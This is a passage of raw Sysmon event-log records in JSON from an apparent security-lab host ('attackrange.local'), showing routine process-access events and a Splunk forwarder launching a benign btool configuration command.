C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.784","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1699,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.784\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.784","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1700,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.784\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-0010FC670300}\r\nTargetProcessId: 3928\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.784","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-0010FC670300}","TargetProcessId":"3928","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1701,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.800\r\nProcessGuid: {41C8662E-1F74-5F25-0000-001032690300}\r\nProcessId: 3948\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool web list settings --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1F74-5F25-0000-0010FC670300}\r\nParentProcessId: 3928\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.800","ProcessGuid":"{41C8662E-1F74-5F25-0000-001032690300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool web list settings --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-1F74-5F25-0000-0010FC670300}","ParentProcessId":"3928","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1702,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.799\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010FC670300}\r\nSourceProcessId: 3928\r\nSourceThreadId: 3932\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-001032690300}\r\nTargetProcessId: 3948\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+146d6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d1d8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.799","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010FC670300}","SourceProcessId":"3928","SourceThreadId":"3932","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-001032690300}","TargetProcessId":"3948","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+146d6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d1d8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1703,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.799\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-001032690300}\r\nTargetProcessId: 3948\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.799","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-001032690300}","TargetProcessId":"3948","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1704,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.799\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.799","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1705,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.799\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.799","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1706,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.799\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.799","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1707,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.799\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 